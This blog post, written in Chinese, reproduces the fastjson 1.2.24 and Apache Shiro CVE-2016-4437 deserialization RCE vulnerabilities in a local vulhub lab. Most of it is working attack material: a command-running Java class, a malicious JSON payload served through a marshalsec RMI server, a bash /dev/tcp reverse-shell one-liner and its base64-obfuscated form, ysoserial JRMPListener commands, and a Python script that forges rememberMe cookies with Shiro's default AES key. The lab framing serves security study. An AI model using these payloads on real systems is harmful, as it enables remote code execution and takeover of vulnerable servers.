首页 前端知识 fastjson_1.2.24和Shiro(CVE-2016-4437)漏洞复现

fastjson_1.2.24和Shiro(CVE-2016-4437)漏洞复现

2024-11-10 09:11:53 前端知识 前端哥 272 260 我要收藏

文章目录

  • 一、fastjson 1.2.24远程命令执行漏洞复现
  • 二、shiro反序列化漏洞(CVE-2016-4437)
    • 1、Shiro漏洞原理
    • 2、手工验证漏洞
    • 3、使用ShiroAttack2

一、fastjson 1.2.24远程命令执行漏洞复现

配置环境:本机java 8环境 + kali操作系统(java8)

cd ./vulhub-master/fastjson/1.2.24-rce/ # 进入目标文件夹
docker-compose up -d # 启动环境

在这里插入图片描述
浏览器访问127.0.0.1:8090.
在这里插入图片描述
将下面代码保存到TouchFile.java中。

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

使用javac编译TouchFile.java
在这里插入图片描述
TouchFile.class复制到kali中,并开启http服务。

python -m http.server 4444

在这里插入图片描述
在本机中安装apache-maven-3.9.6-bin.zip,加一个环境变量,就可以用了~
在这里插入图片描述
在这里插入图片描述
下载marshalsec,然后使用mvn clean package -DskipTests命令生成marshalsec-0.0.3-SNAPSHOT-all.jar

在这里插入图片描述
在这里插入图片描述
marshalsec-0.0.3-SNAPSHOT-all.jar复制到kali中,并使用java8运行下面的命令

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.92.6:4444/#TouchFile" 9999

在这里插入图片描述
在burp中重放下面的数据包:

POST / HTTP/1.1
Host: 192.168.92.6:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.92.6:9999/TouchFile",
        "autoCommit":true
    }
}

在这里插入图片描述
可以看到rmi端显示:
在这里插入图片描述

到靶机里查看命令是否执行成功,输入命令进入fastjson环境容器执行 bash。

docker ps # 查看容器ID
docker exec -it <container_id> bash # 进入shell环境
cd /tmp & ls # 查看是否存在success文件

在这里插入图片描述
到此,复现成功~

二、shiro反序列化漏洞(CVE-2016-4437)

1、Shiro漏洞原理

Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会将用户信息加密,加密过程:用户信息=>序列化=>AES加密=>base64编码=>RememberMe Cookie值。如果用户勾选记住密码,那么在请求中会携带cookie,并且将加密信息存放在cookie的rememberMe字段里面,在服务端收到请求对rememberMe值,先base64解码然后AES解密再反序列化,这个加密过程如果我们知道AES加密的密钥,那么我们把用户信息替换成恶意命令,就导致了反序列化RCE漏洞。在shiro版本<=1.2.4中使用了默认密钥kPH+bIxk5D2deZiIxcaaaA==,这就更容易触发RCE漏洞。

故Payload产生的过程:命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值

2、手工验证漏洞

简单判断漏洞是否存在:勾选记住密码选项后,点击登录,抓包,观察请求包中是否有rememberme字段,响应包中是否有Set-cookie:rememberMe=deleteMe字段。
在这里插入图片描述
具体判断漏洞是否存在:
在这里插入图片描述
手工复现
kali开启5555端口监听

nc -lnvp 5555 # kali监听5555端口

反弹shell命令,是为了获取靶机的shell,同时当命令中包含重定向 <、> 和管道符 | 时,需要进行 base64 编码绕过检测(不编码,执行不了,已经试过了~)runtime-exec

bash -i >& /dev/tcp/192.168.92.6/5555 0>&1 # 反弹shell命令,用shiro反序列化漏洞让靶机执行
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjkyLjYvNTU1NSAwPiYx}|{base64,-d}|{bash,-i}

在这里插入图片描述
执行下面的命令:

git clone https://github.com/frohoff/ysoserial.git # 下载ysoserial-all.jar

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 7777 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjkyLjYvNTU1NSAwPiYx}|{base64,-d}|{bash,-i}"
# 这串代码的大致意思就是:在kali上搭建一个服务器,监听了7777端口,并且存放了反弹到5555端口的反弹shell,且该反弹shell是通过CommonsCollections5利用链生成的反序列化数据。

注意:这里java版本要用java8。
在这里插入图片描述
生成AES加密=>Base64编码后的rememberMe字段:

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
    popen = subprocess.Popen(['java<最好用绝对路径>', '-jar', 'ysoserial-all.jar<最好用绝对路径>'', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext
 
if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])   
print "rememberMe={0}".format(payload.decode())

注意:python版本为python2.7;还有用pip2安装pycryptodome,即pip install pycryptodome

在这里插入图片描述
在这里插入图片描述
向目标服务器发送下面的数据包

POST /doLogin HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/login;jsessionid=F02F219A55D5D439A3CC841489816ADF
Cookie: JSESSIONID=F02F219A55D5D439A3CC841489816ADF;rememberMe=mHG+Lu46TyikBy2cgkoOaj3UIdXJytnsFdI4mSd9P5V/cYekTMKeTdmZWfosHFPw9fBw0LpQxALUX3V7uLM4ClTztYsVS/VkumK17LO3M7uUN6tHIcFcy/iFtxCIeRnAYr+fV3MXwrUpgi9nfs9fMWnzv22imiIMXwaj1rYEly9XY9KrKr19MiNx2vAa/DXdvH8wm63XFLROd1iSb8FL9WdHKw60w+fy+jCsKeaibsi6NIJqcoTeePDCq4FFU3yAJh3x7bqThGg5NPpdPCwtQ7KBRiYjOxjs8RSwcydwws9G7DmaJW/2Rzq1dsa9T2aVQUi4kkbhrjSnG/suAW6aGapy4u+wORmduJDS9aIn9NFT9dXqEK4L0iRGPfF6aQ88HFSzT6zBxOVUOis/Tt/s5g==
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

username=123&password=123&rememberme=remember-me

在这里插入图片描述
结果:
在这里插入图片描述
在这里插入图片描述
攻击过程复盘
对于攻击者而言,核心就是干了两件事:

  1. 搭建VPS进行JRMPListener,存放反弹shell的payload1,且该payload是恶意的序列化数据;
  2. 将上述VPS进行JRMPListener的地址进行了AES加密和base64编码,构造请求包cookie中的rememberMe字段,向存在漏洞的服务器发送加密编码后的结果payload2。

靶机服务器的沦陷过程:

  1. 接收到请求包payload2,进行base64解码=>AES解密,发现要和一个VPS的JRMP 7777端口进行通信。
  2. 向恶意站点VPS的JRMP 7777进行请求,接收到了到了序列化后的恶意代码(反弹shell到攻击机的6666端口)payload1。
  3. 对payload1执行了反序列化,执行了反弹shell的恶意命令,就此沦陷。

3、使用ShiroAttack2

直接使用工具ShiroAttack2。

  1. 直接爆破密码,注意目标地址要加上协议~
    在这里插入图片描述
  2. 爆破利用链及回显
    在这里插入图片描述
  3. 远程执行命令
    在这里插入图片描述
转载请注明出处或者链接地址:https://www.qianduange.cn//article/20169.html
标签
网络安全
评论
发布的文章
大家推荐的文章
会员中心 联系我 留言建议 回顶部
复制成功!